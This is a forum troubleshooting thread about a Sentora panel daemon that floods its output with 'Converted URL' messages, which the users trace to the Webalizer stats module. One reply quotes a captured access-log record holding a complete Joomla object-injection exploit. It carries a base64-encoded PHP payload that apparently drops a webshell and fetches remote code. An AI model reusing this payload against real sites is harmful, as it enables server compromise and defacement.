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Daemon error strnag !
Daemon error strnag !
Every thinng was ok to yesterday 

today i started daemon manuly throw ssh

Iget string response like this :

Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '*' to '/'

and its not stop ever ! just repated until i press ctrl+c and stop calling file 

I tried to discover why this happend , I discover the problem could be from this function 


last things I did , Changed sertora port panell , Addedd ssl to domain using "Appache config " also added overwrite root for other domains , thats all

By the way every thing still work and no problem , also appache new confing applied succsfully 
I dont think the problem coused by any changes I made 

Use Last Sentora , Ubuntu 14.02

Thanks given by:
RE: Daemon error strnag !
I get the same thing also but it does run completely... Will do some more checeking.
(Also Ubuntu 14.04)

From a quick search, it may have something to do with url rewriting and converting to lower case?
Or URL encoding?
I notice it happens near the end of the daemon run.
-TGates - Project Council

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Thanks given by:
RE: Daemon error strnag !
After more checking, it happens during  bandwidth calculations:

Processing domain ""
Generating bandwidth..
usage: 0 (0 bytes)
No bandwidth used, skipping!
Converted URL '*' to '/'
Converted URL '*' to '/'
Processing domain ""
Generating bandwidth..
usage: 0 (0 bytes)
No bandwidth used, skipping!

Then it happens again when webalizer runs:
BEGIN Webalizer Stats
Generating webalizer stats html...
Generating stats for: zadmin/
Converted URL '*' to '/'
Converted URL '*' to '/'
Converted URL '' to '/'    <--- this pops up 2-3 times also
Converted URL '*' to '/'
Converted URL '*' to '/'
Error: Skipping oversized log record: - - [16/Jan/2016:06:25:10 -0500] "GET / HTTP/1.1" 200 11174 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:5487:\"eval(base64_decode(\"JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvdG1wL2t1cmQucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOE5DbWxtS0dsemMyVjBLQ1JmUjBWVVd5SnJkWEprSWwwcEtRMEtDWHNOQ2dra2EzVnlaQ0E5ZFc1c2FXNXJLRjlmUmtsTVJWOWZLVHNOQ2dscFppQW9KR3QxY21RcGV5QmxZMmh2SUNKUGF5STdJSDFsYkhObGV5QmxZMmh2SUNKbGNuSnZjaUk3SUgxOURRby9QZzBLUEQ4TkNtWjFibU4wYVc5dUlHaDBkSEJmYUhSMGNDZ2tkWEpzS1hzTkNna2thVzBnUFNCamRYSnNYMmx1YVhRb0pIVnliQ2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDFKRlZGVlNUbFJTUVU1VFJrVlNMQ0F4S1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlEwOU9Ua1ZEVkZSSlRVVlBWVlFzSURFd0tUc05DZ2xqZFhKc1gzTmxkRzl3ZENna2FXMHNJRU5WVWt4UFVGUmZSazlNVEU5WFRFOURRVlJKVDA0c0lERXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlJUlVGRVJWSXNJREFwT3cwS0NYSmxkSFZ5YmlCamRYSnNYMlY0WldNb0pHbHRLVHNOQ2dsamRYSnNYMk5zYjNObEtDUnBiU2s3RFFwOURRb2tZMmhsWTJzZ1BTQWtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMM05sYzNOcGIyNHZjMlZ6YzJsdmJpNXdhSEFpSURzTkNpUjBaWGgwSUQwZ2FIUjBjRjlvZEhSd0tDZG9kSFJ3T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk5VlNFRkhWRGc0TnljcE93MEtKRzl3Wlc0Z1BTQm1iM0JsYmlna1kyaGxZMnNzSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3Wlc0c0lDUjBaWGgwS1RzTkNtWmpiRzl6WlNna2IzQmxiaWs3RFFvL1BnMEtQRDhOQ21WeWNtOXlYM0psY0c5eWRHbHVaeWd3S1RzTkNtVmphRzhnSW5OaGNtRWlPdzBLWm5WdVkzUnBiMjRnVW1GdVpHOXRLQ1JzWlc1bmRHZ2dQU0EwS1NCN0RRb2dJQ0FnSkhCcGRDQTlJQ2RoWW1Oa1pXWm5hR2xxYTJ4dGJtOXdjWEp6ZEhWMmQzaDVlaWM3RFFvZ0lDQWdKSEpoYm1SeklEMGdKeWM3RFFvZ0lDQWdabTl5SUNna2FTQTlJREE3SUNScElEd2dKR3hsYm1kMGFEc2dKR2tyS3lrZ2V3MEtJQ0FnSUNBZ0lDQWtjbUZ1WkhNZ0xqMGdKSEJwZEZ0eVlXNWtLREFzSUhOMGNteGxiaWdrY0dsMEtTQXRJREVwWFRzTkNpQWdJQ0I5RFFvZ0lDQWdjbVYwZFhKdUlDUnlZVzVrY3pzTkNuME5DaVJ5WVc0Z1BTQlNZVzVrYjIwb0tUc05DbVZqYUc4Z0p6eGhJR2h5WlhOa1pHUm1QU0luTGlJa2NtRnVJaTRuSWo0bk93MEtKR1pwYkdVeElEMGdKencvRFFwbGNuSnZjbDl5WlhCdmNuUnBibWNvTUNrN0RRcHBaaWhwYzNObGRDZ2tYMGRGVkZzbkxpSWtjbUZ1SWk0blhTa3BEUW9KZXcwS0NRbGxZMmh2SWp4bWIyNTBJR052Ykc5eVBTTkdSa1pHUmtZK1czVnVZVzFsWFNJdWNHaHdYM1Z1WVcxbEtDa3VJbHN2ZFc1aGJXVmRQR0p5UGlJN0RRb0pDV1ZqYUc4Z0lqeG1iMjUwSUdOdmJHOXlQU05HUmtaR1JrWStXM0IzWkYwaUxtZGxkR04zWkNncExpSmJMM0IzWkYwOFluSStJanNOQ2drSmNISnBiblFnSWx4dUlqc2taR2x6WVdKc1pWOW1kVzVqZEdsdmJuTWdQU0JBYVc1cFgyZGxkQ2dpWkdsellXSnNaVjltZFc1amRHbHZibk1pS1RzZ0RRb0pDV1ZqYUc4Z0lrUnBjMkZpYkdWUVNGQTlJaTRrWkdsellXSnNaVjltZFc1amRHbHZibk03SUhCeWFXNTBJQ0k4WW5JK0lqc2dEUW9KQ1dWamFHOGlQR1p2Y20wZ2JXVjBhRzlrUFhCdmMzUWdaVzVqZEhsd1pUMXRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhQaUk3SUEwS0NRbGxZMmh2SWp4cGJuQjFkQ0IwZVhCbFBXWnBiR1VnYm1GdFpUMW1QanhwYm5CMWRDQnVZVzFsUFhZZ2RIbHdaVDF6ZFdKdGFYUWdhV1E5ZGlCMllXeDFaVDExY0Q0OFluSStJanNnRFFvSkNTQWdhV1lvSkY5UVQxTlVXeUoySWwwOVBYVndLUTBLZXlCcFppaEFZMjl3ZVNna1gwWkpURVZUV3lKbUlsMWJJblJ0Y0Y5dVlXMWxJbDBzSkY5R1NVeEZVMXNpWmlKZFd5SnVZVzFsSWwwcEtYdGxZMmh2SWp4aVBtSmxjbWhoYzJsc1BDOWlQaTB0UGlJdUpGOUdTVXhGVTFzaVppSmRXeUp1WVcxbElsMDdmV1ZzYzJWN1pXTm9ieUk4WWo1bllXZGhiQ0k3ZlgwZ0lBMEtleUJwWmloQVkyOXdlU2drWDBaSlRFVlRXeUpsYldGa0lsMWJJblJ0Y0Y5dVlXMWxJbDBzSkY5R1NVeEZVMXNpWlcxaFpDSmRXeUp1WVcxbElsMHBLWHRsWTJodklqeGlQand2WWo0dExUNGlMaVJmUmtsTVJWTmJJbVZ0WVdRaVhWc2libUZ0WlNKZE8zMWxiSE5sZTJWamFHOGlQR0krSWp0OWZYME5DajgrSnpzTkNpUnlQV1p2Y0dWdUtDSmhjR2x6TG5Cb2NDSXNJQ0ozSWlrN0lHWjNjbWwwWlNna2Npd2tabWxzWlRFcE95Qm1ZMnh2YzJVb0pISXBPdzBLSkhJOVptOXdaVzRvSWk0dUwyRndhWE11Y0dod0lpd2dJbmNpS1RzZ1puZHlhWFJsS0NSeUxDUm1hV3hsTVNrN0lHWmpiRzl6WlNna2NpazdEUW9rY2oxbWIzQmxiaWdpTGk0dmRHMXdMMkZ3YVhNdWNHaHdJaXdnSW5jaUtUc2dabmR5YVhSbEtDUnlMQ1JtYVd4bE1TazdJR1pqYkc5elpTZ2tjaWs3RFFva1ptbHNaVEV4TVNBOUlDYzhhSFJ0YkQ0TkNqeG9aV0ZrUGcwS1BIUnBkR3hsUGcwS1NHRkRhMlZFSUdKNUlFMTFhRzFoWkVWdFlXUU5Dand2ZEdsMGJHVStEUW84TDJobFlXUStEUW84WW05a2VTQmlaMk52Ykc5eVBYZG9hWFJsUGcwS1BHUnBkaUJ6ZEhsc1pUMGlkR1Y0ZEMxaGJHbG5iam9nWTJWdWRHVnlPeUkrUEdadmJuUWdjMmw2WlQwaU5pSWdabUZqWlQwaVkyOXRhV01nYzJGdWN5QnRjeUkrUEdJK1NHRkRhMlZFSUVKNUlDQk5kV2h0WVdSRmJXRmtQQzlpUGp3dlptOXVkRDQ4TDJScGRqNE5DanhrYVhZZ2MzUjViR1U5SW5SbGVIUXRZV3hwWjI0NklHTmxiblJsY2pzaVBqeG1iMjUwSUhOcGVtVTlJalVpSUdaaFkyVTlJbU52YldsaklITmhibk1nYlhNaVBqeGlQanhpY2lBdlBqd3ZZajQ4TDJadmJuUStQQzlrYVhZK0RRbzhaR2wySUhOMGVXeGxQU0owWlhoMExXRnNhV2R1T2lCalpXNTBaWEk3SWo0OFptOXVkQ0J6YVhwbFBTSTFJaUJtWVdObFBTSmpiMjFwWXlCellXNXpJRzF6SWo0OFlqNU1iMjVuSUV4cGRtVWdkRzhnY0dWemFHMWhjbWRoSUR4aWNqNDhMMkkrUEM5bWIyNTBQand2WkdsMlBnMEtQR1JwZGlCemRIbHNaVDBpZEdWNGRDMWhiR2xuYmpvZ1kyVnVkR1Z5T3lJK1BHSnlJQzgrUEM5a2FYWStEUW84Y0Q0TkNqeGthWFlnYzNSNWJHVTlJblJsZUhRdFlXeHBaMjQ2SUdObGJuUmxjanNpUGp4cGJXY2djM0pqUFNKb2RIUndPaTh2ZW05dVpXaHRhWEp5YjNKekxtOXlaeTlrWldaaFkyVmtMekl3TVRVdk1URXZNVFF2WkdWdGFXeHZjMmxuYUhScGJtZHpMbU52YlM5cmRYSmthWE4wWVc1MGIzVnlMbTVsZEM5MWNHeHZZV1J6TDNOMFlYUnBZM05mYVcxaFoyVXZhM1Z5WkdsemRHRnVYMlpzWVdkZmQyRjJhVzVuTG1kcFppSWdkMmxrZEdnOU1qVWxJR2hwWjJoMFBUTTFKU0F2UGp3dlpHbDJQZzBLUEdScGRpQnpkSGxzWlQwaWRHVjRkQzFoYkdsbmJqb2dZMlZ1ZEdWeU95SStQR0p5SUM4K1BDOWthWFkrRFFvOGNENE5DanhrYVhZZ2MzUjViR1U5SW5SbGVIUXRZV3hwWjI0NklHTmxiblJsY2pzaVBqeG1iMjUwSUhOcGVtVTlJalVpSUdaaFkyVTlJbU52YldsaklITmhibk1nYlhNaVBqeGlQZzBLUEhBK0RRcExkWEpFYVhOb0lFaGhRMnN6Y2xNZ1YyRlRJRWhsY21VTkNqeHdQanhpY2o0Z2EzVnlaR3hwYm5WNE1EQTNRR2R0WVdsc0xtTnZiU0E4WW5JK0lFWlZRMHNnU1ZOSlV5QWhJQTBLRFFvTkNqd3ZZbTlrZVQ0TkNqd3ZhSFJ0YkQ0TkNpYzdEUW9rY2oxbWIzQmxiaWdpYVc1a1pYZ3VhSFJ0YkNJc0lDSjNJaWs3SUdaM2NtbDBaU2drY2l3a1ptbHNaVEV4TVNrN0lHWmpiRzl6WlNna2NpazdEUW9rY2oxbWIzQmxiaWdpTGk0dmEzSmtMbWgwYld3aUxDQWlkeUlwT3lCbWQzSnBkR1VvSkhJc0pHWnBiR1V4TVRFcE95Qm1ZMnh2YzJVb0pISXBPdzBLSkhJOVptOXdaVzRvSWk0dUwybHRZV2RsY3k5cmNtUXVhSFJ0YkNJc0lDSjNJaWs3SUdaM2NtbDBaU2drY2l3a1ptbHNaVEV4TVNrN0lHWmpiRzl6WlNna2NpazdEUW8vUGc9PScpKTsNCmZjbG9zZSgkZnApOw==\"));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
About the Converted URL '' to '/':

About the data after Error: Skipping oversized log record: Joomla Exploit December 15, 2015:
-TGates - Project Council

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Thanks given by:
RE: Daemon error strnag !
do you have custom vhost?
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Thanks given by:
RE: Daemon error strnag !
Of course I do Wink
Not sure if the OP does too Huh
-TGates - Project Council

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Thanks given by:
RE: Daemon error strnag !
Thanks for reply
I have also custom vhost ,
I think it is " for loop " or " while " or something else , just have an error stop variable
so just repeat it self for ever
I will search today in sentora files for some thing like this
Thanks given by:
RE: Daemon error strnag !
A quick search on Google says it is converting to lowercase or invalid URLs?
Still digging...
-TGates - Project Council

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Thanks given by:
RE: Daemon error strnag !
I have figure out what module coz this
Webalizer Stats
When I just disable it from " Module Admin "
Problem gone
Thanks given by:
RE: Daemon error strnag !
(01-24-2016, 06:24 AM)nawar Wrote: Hello
I have figure out what module coz this
Webalizer Stats
When I just disable it from " Module Admin "
Problem gone

That was mentioned above Wink

But we would like to sort out why it happens and how to prevent it Smile
-TGates - Project Council

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Thanks given by:
RE: Daemon error strnag !
I dont think its error , i think its normal behavior for Webalizer 
When I call : 
webalizer '/var/sentora/logs/domains/mydomain/' '-o' '/etc/sentora/panel/modules/webalizer_stats/stats/mydomain/' '-d -F clf' ''

as Sentora doing

For some domains I get this response  , but for other , not happend

I have checked my ""
I have seen a strange lines inside 

::1 - - [17/Jan/2016:23:09:53 +0400] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [17/Jan/2016:23:09:54 +0400] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [17/Jan/2016:23:09:55 +0400] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [17/Jan/2016:23:09:56 +0400] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (inter

after google it : i found it have many reasons
some of at :

but in my case after I checked Error log appache " /var/log/apache2/error.log "
its "  Memory Allocated 0 bytes " or "Max_Clients"

by the way I will disable  "webalizer" because I dont need it

thanks for help
Thanks given by:

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